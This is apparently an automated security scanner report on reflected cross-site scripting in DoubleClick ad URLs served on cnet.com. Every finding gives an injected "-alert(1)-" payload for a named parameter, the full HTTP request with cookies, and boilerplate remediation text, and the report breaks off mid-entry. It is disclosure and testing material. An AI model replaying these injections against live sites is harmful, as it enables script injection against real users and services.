GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=904b8"-alert(1)-"9c8a7d52c2b&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 801e3"-alert(1)-"324ce86438a was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100801e3"-alert(1)-"324ce86438a&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fedf"-alert(1)-"f027a765496 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=5fedf"-alert(1)-"f027a765496&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfb97"-alert(1)-"232cf4defa8 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000cfb97"-alert(1)-"232cf4defa8&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc4e"-alert(1)-"95e5ea569c was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243abc4e"-alert(1)-"95e5ea569c&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff21c"-alert(1)-"d3c6d27513c was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EEff21c"-alert(1)-"d3c6d27513c&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9801"-alert(1)-"5173cd8ca68 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121a9801"-alert(1)-"5173cd8ca68&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e79"-alert(1)-"1aa564ccc88 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3b9e79"-alert(1)-"1aa564ccc88&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da3ab"-alert(1)-"c65b51b63f7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736da3ab"-alert(1)-"c65b51b63f7&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCF ...[SNIP]...
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736da3ab"-alert(1)-"c65b51b63f7&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=1 ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a37"-alert(1)-"d8785f269f4 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.4113a37"-alert(1)-"d8785f269f4&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCF ...[SNIP]... =&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.4113a37"-alert(1)-"d8785f269f4&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094144_240360897_41852066"); var wmode = "opaque"; var bg = "same as SWF ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d39ad"-alert(1)-"704ff54a520 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5d39ad"-alert(1)-"704ff54a520&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79382"-alert(1)-"be7bd050b4b was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=079382"-alert(1)-"be7bd050b4b&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24379"-alert(1)-"3bf2868c0b9 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=24379"-alert(1)-"3bf2868c0b9&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64e68"-alert(1)-"39f92f3878c was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=64e68"-alert(1)-"39f92f3878c&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e780b"-alert(1)-"3626fe1b7ba was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3e780b"-alert(1)-"3626fe1b7ba&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85673"-alert(1)-"16f4b851481 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=85673"-alert(1)-"16f4b851481&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6dcf"-alert(1)-"da186d797f1 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
